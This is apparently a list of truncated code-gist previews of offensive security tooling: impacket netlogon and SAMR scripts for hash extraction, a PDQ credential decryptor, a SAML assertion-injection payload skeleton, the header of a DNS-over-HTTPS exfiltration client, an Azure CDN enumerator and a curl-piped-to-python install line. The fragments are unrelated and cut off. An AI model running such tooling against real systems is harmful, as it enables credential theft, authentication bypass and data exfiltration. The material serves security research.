| // Return, but across multiple frames. | |
| // | |
| // This function unwinds the given number of frames, then sets the return value provided, emulating as if this number | |
| // of functions returned, with the last one returning the value provided in RetVal. Can be used to hook a callee when | |
| // you don't have a convenient way to hook it directly and actually just want to stub it out with a return value. | |
| // | |
| // @param FramesToSkip The number of frames to skip, starting from the current frame. | |
| // @param RetVal The value to return from the last frame. | |
| // @param Context Context to start from, in case you want to SuperReturn from somewhere deeper. | |
| DECLSPEC_NOINLINE void SuperReturn( |
| from impacket.dcerpc.v5 import epm, rpcrt, transport, nrpc, samr | |
| from impacket.uuid import bin_to_uuidtup | |
| from impacket.crypto import SamDecryptNTLMHash | |
| from binascii import unhexlify, hexlify | |
| from random import randbytes | |
| import sys | |
| import argparse | |
| # This script perform a netsync attack. No SMB involved | |
| # My first idea was to only use netlogon SSP, however SAMR seems not compatible |
| /** | |
| Compile with your C console project. | |
| */ | |
| #include <stdio.h> | |
| #include <windows.h> | |
| #define __UNKNOWN_APP 0 | |
| #define __CONSOLE_APP 1 | |
| #define __GUI_APP 2 |
| import hashlib | |
| import struct | |
| import argparse | |
| from Crypto.Cipher import AES #pip install pycryptodome | |
| def decrypt(blob, key): | |
| """Decrypt PDQ credential blobs""" | |
| #Format for the blob is [header][ivlen][iv][encdata] | |
| #Example blob: 28656e63727970746564290010644d18eb7817dad6de5f531b1b0b60113087662f3cf0ffdaa7760418c15ee6ea | |
| #Example blob: [28656e637279707465642900][10][644d18eb7817dad6de5f531b1b0b6011][3087662f3cf0ffdaa7760418c15ee6ea] |
CVE-2025-3155 affects Yelp which is The Gnome's user help application. It's installed by default on Ubuntu desktop.
A URI scheme is the part of a Uniform Resource Identifier (URI) that identifies a protocol or a specific application (steam://run/1337) that should handle the resource identified by the URI. It's the part that comes before the colon (://).
| Import-Module Az | |
| Connect-AzAccount | |
| $ipre = "^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$" | |
| function Get-ClassicOrigins() { | |
| $profs = Get-AzCDNProfile | |
| $coll = @() | |
| foreach ($prof in $profs) { |
| import base64 | |
| import urllib.parse | |
| SKELETON_PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE xml SYSTEM 'x" ><!--'> | |
| FAKE_ASSERTION | |
| <![CDATA[--> | |
| REAL_ASSERTION | |
| <!--]]>--></saml2p:Response> | |
| """ |
| """ | |
| Author : Hossam Ehab | |
| Info : Stealthy Data Exfiltration Using (DoH) - Client Code | |
| Date : May 26, 2024 | |
| """ | |
| import os, glob, requests, logging, struct, base64, random, time, httpx | |
| from datetime import datetime | |
| import urllib3 | |
| import win32com.client |
| ################################################## | |
| # Extra tools | |
| # $ sudo apt install -y xclip grc gobuster rlwrap evil-winrm powercat seclists peass raven | |
| # urlencode: | |
| # $ sudo apt install gridsite-clients | |
| # Install flatpak | |
| # -> https://www.kali.org/docs/tools/flatpak/ | |
| # Python2 pip | |
| # $ sudo sh -c "curl https://bootstrap.pypa.io./pip/2.7/get-pip.py | python2" | |
| # Cool Hollywood screensaver ❤️ |
| from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc | |
| from impacket.uuid import bin_to_uuidtup | |
| from binascii import unhexlify | |
| from random import randbytes | |
| import sys | |
| # Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3) | |
| # Pure TCP RPC is used (ncacn_ip_tcp option) | |
| # RC4 is used here because to use AES, impacket must be patched | |
| # Tested with impacket 0.12.0 on GOAD |
